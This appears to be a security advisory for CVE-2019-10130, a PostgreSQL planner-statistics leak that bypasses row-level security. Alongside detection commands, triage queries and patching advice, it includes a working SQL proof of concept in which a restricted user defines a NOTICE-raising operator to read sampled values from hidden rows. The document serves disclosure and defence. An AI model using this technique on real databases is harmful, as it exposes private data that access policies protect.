Platform
postgresql
Component
postgresql
Fixed in
11.3
10.8
9.6.13
9.5.17
CVE-2019-10130 is an information disclosure vulnerability in PostgreSQL 11.x prior to 11.3, 10.x prior to 10.8, 9.6.x prior to 9.6.13 and 9.5.x prior to 9.5.17. It lets a user who can query a table read values that ANALYZE sampled from its columns into the planner's statistics, including values from rows that a row security policy hides from that user. The flaw is that the planner's selectivity estimators consulted the column statistics without first checking whether a row security policy applies to the table. Fixes shipped in the minor releases 11.3, 10.8, 9.6.13 and 9.5.17.
To exploit the flaw, an attacker needs SELECT on a table that is protected by row-level security and the ability to create a function and an operator (CREATE on some schema, which PUBLIC holds on the public schema by default in these releases). PostgreSQL samples each column when ANALYZE runs and stores the most common values, their frequencies and a histogram in pg_statistic for the query planner. When a WHERE clause applies an operator to such a column, the operator's selectivity estimator runs the operator's underlying function against the stored sample values to estimate how many rows match. Before the fix, the planner did this for any user with SELECT on the table, without considering row security policies, so a user-defined, non-leakproof operator that reports its input (for example by raising a NOTICE) reveals the sampled values, including those from rows the policy would never return. What leaks is whatever ANALYZE sampled, typically the most frequent values in the column, which may be personally identifiable information or sensitive business data depending on the column. Although the CVSS score is LOW, the bypass is significant in deployments that rely on row-level security to meet data privacy obligations.
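The leak described above, reproduced end to end on one instance. This is an added example and not code from the original advisory or from the PostgreSQL project; the table, role, column and operator names (accounts, mallory, ssn, ===) and the sample values are assumptions for the demonstration.

```sql
-- Added example, not from the original advisory or the PostgreSQL project.
-- Sets up a row-security-protected table, then shows how a restricted user
-- reads the sampled statistics through a user-defined operator on an
-- unpatched server, and why the same query is harmless after the fix.
-- Names and values are assumptions. Run as a superuser.
CREATE TABLE accounts (id serial PRIMARY KEY, owner text NOT NULL, ssn text NOT NULL);
INSERT INTO accounts (owner, ssn)
    SELECT 'alice',   '111-11-1111' FROM generate_series(1, 100)   -- rows mallory must never see
    UNION ALL
    SELECT 'mallory', '999-99-9999' FROM generate_series(1, 5);    -- mallory's own rows

ALTER TABLE accounts ENABLE ROW LEVEL SECURITY;
CREATE POLICY own_rows ON accounts FOR SELECT USING (owner = current_user);
CREATE ROLE mallory LOGIN;
GRANT SELECT ON accounts TO mallory;
ANALYZE accounts;   -- samples ssn into pg_statistic; '111-11-1111' becomes a most-common value

-- Now act as the restricted user.
SET ROLE mallory;
SELECT count(*) FROM accounts;   -- 5: the policy hides alice's rows

-- A non-leakproof comparison function that reports whatever it is given.
-- mallory can create it because PUBLIC has CREATE on the public schema by default.
CREATE FUNCTION leak_eq(text, text) RETURNS boolean LANGUAGE plpgsql AS $$
BEGIN
    RAISE NOTICE 'planner handed me the sampled value: %', $1;
    RETURN $1 = $2;
END
$$;
CREATE OPERATOR === (LEFTARG = text, RIGHTARG = text,
                     PROCEDURE = leak_eq, RESTRICT = eqsel);

-- Planning alone is enough: eqsel estimates selectivity by calling leak_eq on
-- each most-common value stored for ssn, passing the sampled value as $1.
EXPLAIN SELECT * FROM accounts WHERE ssn === 'anything';
-- Unpatched (e.g. 11.2): NOTICE: planner handed me the sampled value: 111-11-1111
--                        NOTICE: planner handed me the sampled value: 999-99-9999
-- Patched (11.3, 10.8, 9.6.13, 9.5.17): no NOTICE. The table carries a row
-- security policy and === is not leakproof, so the estimator ignores the
-- sample and falls back to a default selectivity.

RESET ROLE;
-- Cleanup.
DROP OPERATOR === (text, text);
DROP FUNCTION leak_eq(text, text);
DROP TABLE accounts;
DROP ROLE mallory;
```

The same script doubles as the post-upgrade check: if the EXPLAIN still prints a NOTICE carrying alice's value after the minor release is installed, the fix is not running. Note that NOTICEs go to the client, not the server log, unless log_min_messages is lowered.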
The CVE record for CVE-2019-10130 was published on July 30, 2019; PostgreSQL had already announced the issue and shipped the fixed minor releases on May 9, 2019. There is no indication of the vulnerability being actively exploited in the wild, and it is not listed in the CISA KEV catalog. Public proof-of-concept (PoC) code is available and demonstrates that exploitation is straightforward. The low CVSS score suggests a relatively low probability of exploitation, but the availability of PoC code warrants attention and remediation.
Deployments of PostgreSQL 9.5, 9.6, 10 and 11 below the fixed minor releases are affected, but only where row-level security policies are used to hide rows from users who have SELECT on the table; without such a policy the user could read the column directly and the statistics reveal nothing new. Multi-tenant and shared database instances that rely on row-level security for tenant isolation, and organizations in regulated industries that use it to restrict access to PII, should be assessed first. The attack also requires that the user can create a function and an operator, so instances where untrusted roles hold CREATE on a schema (the default for the public schema in these releases) are the most exposed.
• postgresql: Check the server version with psql and compare it with the fixed releases (9.5.17, 9.6.13, 10.8, 11.3):
  psql -U postgres -c "SELECT version();"
• postgresql: Examine the PostgreSQL logs for functions or operators created by application roles, and for ERROR or WARNING messages raised from a user-defined function during query planning (NOTICEs are not logged unless log_min_messages is lowered). Queries reading pg_statistic directly are not the signal: that catalog is restricted to superusers, and the attack never touches it.
• linux / server: Use journalctl to filter for PostgreSQL-related errors or warnings (the unit name varies by distribution, e.g. postgresql@11-main on Debian and Ubuntu):
  journalctl -u postgresql --since "1 week ago" | grep -i error
disclosure
patch
Exploit status
EPSS
0.20% (42nd percentile)
CVSS vector
The fix for CVE-2019-10130 is to upgrade to the fixed minor release for the major version in use: 9.5.17, 9.6.13, 10.8 or 11.3, or any later release. Minor releases do not require a dump and restore, so this is normally a package update and a restart. If the upgrade must wait, reduce what an attacker needs rather than adding more row-level security, which is exactly the control being bypassed: revoke CREATE on schemas from roles that do not need it (REVOKE CREATE ON SCHEMA public FROM PUBLIC), since the attack depends on defining a leaky function and operator; grant SELECT on individual columns rather than whole tables, so that sensitive columns a role does not need are not readable at all; and keep the most sensitive values in tables that restricted roles cannot query. These measures raise the bar but are not a substitute for the patch. Monitor the logs for operators or functions created by application roles. After upgrading, confirm the fix by re-running a query that previously made a user-defined operator report sampled values and checking that it no longer does.
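Triage queries for the mitigation above and for the version and policy checks the detection list calls for, so that the version comparison, the inventory of row-security-protected tables and the schema-privilege check can be run from one psql session. These are added queries, not from the original advisory or from the PostgreSQL project; the column aliases and the 'fixed'/'vulnerable' labels are my own, and the version thresholds are the fixed minor releases listed in the advisory.

```sql
-- Added triage queries, not from the original advisory. Run as a superuser
-- on each instance to be assessed. Labels and aliases are assumptions.

-- 1. Compare server_version_num with the first fixed minor release of each
--    line: 11.3 = 110003, 10.8 = 100008, 9.6.13 = 90613, 9.5.17 = 90517.
WITH v AS (SELECT current_setting('server_version_num')::int AS n)
SELECT version() AS full_version,
       n          AS version_num,
       CASE
         WHEN n >= 110003 THEN 'fixed'                                   -- also covers 12.x and later
         WHEN n >= 110000 THEN 'vulnerable: upgrade to 11.3 or later'
         WHEN n >= 100008 THEN 'fixed'
         WHEN n >= 100000 THEN 'vulnerable: upgrade to 10.8 or later'
         WHEN n >=  90613 THEN 'fixed'
         WHEN n >=  90600 THEN 'vulnerable: upgrade to 9.6.13 or later'
         WHEN n >=  90517 THEN 'fixed'
         WHEN n >=  90500 THEN 'vulnerable: upgrade to 9.5.17 or later'
         ELSE 'release line not listed in this advisory; check the PostgreSQL announcement'
       END AS cve_2019_10130_status
FROM v;

-- 2. Tables whose rows are filtered by a row security policy. Only their
--    sampled statistics hold anything the attacker cannot already read,
--    and the last (auto)analyze time shows how fresh that sample is.
SELECT n.nspname           AS schema_name,
       c.relname           AS table_name,
       c.relforcerowsecurity AS forced_for_owner,
       count(p.oid)        AS policies,
       s.last_analyze,
       s.last_autoanalyze
FROM pg_class c
JOIN pg_namespace n ON n.oid = c.relnamespace
LEFT JOIN pg_policy p ON p.polrelid = c.oid
LEFT JOIN pg_stat_user_tables s ON s.relid = c.oid
WHERE c.relrowsecurity
GROUP BY n.nspname, c.relname, c.relforcerowsecurity, s.last_analyze, s.last_autoanalyze
ORDER BY 1, 2;

-- 3. Schemas in which every role may create objects. A role with CREATE here
--    can define the leaky function and operator the attack needs.
SELECT n.nspname AS schema_name
FROM pg_namespace n
WHERE n.nspname NOT LIKE 'pg\_%'
  AND n.nspname <> 'information_schema'
  AND has_schema_privilege('public', n.oid, 'CREATE')
ORDER BY 1;

-- 4. Interim hardening while the upgrade is scheduled. This raises the bar
--    for untrusted roles; it does not replace the fixed release.
REVOKE CREATE ON SCHEMA public FROM PUBLIC;
```

Query 3 uses the special role name public, which the has_*_privilege functions accept; any schema it returns is one where an application role could define the operator used in the attack. Re-run query 1 after the package update to confirm the running binary, not just the installed package, reports a fixed version.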
Update PostgreSQL to the latest available release. Versions 9.5.17, 9.6.13, 10.8 and 11.3 fix this vulnerability.
CVE-2019-10130 is a vulnerability in PostgreSQL that lets a user read sampled column values through the query planner's statistics, bypassing row security policies. It affects 11.x before 11.3, 10.x before 10.8, 9.6.x before 9.6.13 and 9.5.x before 9.5.17.
You are affected if you are running PostgreSQL versions 9.5, 9.6, 10, or 11 prior to the respective fixed versions (9.5.17, 9.6.13, 10.8, and 11.3).
Upgrade to the fixed minor release for your major version (9.5.17, 9.6.13, 10.8 or 11.3) to resolve this vulnerability. If an immediate upgrade is not possible, revoke CREATE on schemas from untrusted roles and limit SELECT on sensitive columns; adding more row-level security policies does not help, since those are what the flaw bypasses.
There is no current evidence of active exploitation in the wild, although public proof-of-concept code exists.
Refer to the PostgreSQL security advisory at https://www.postgresql.org/announcements/security.php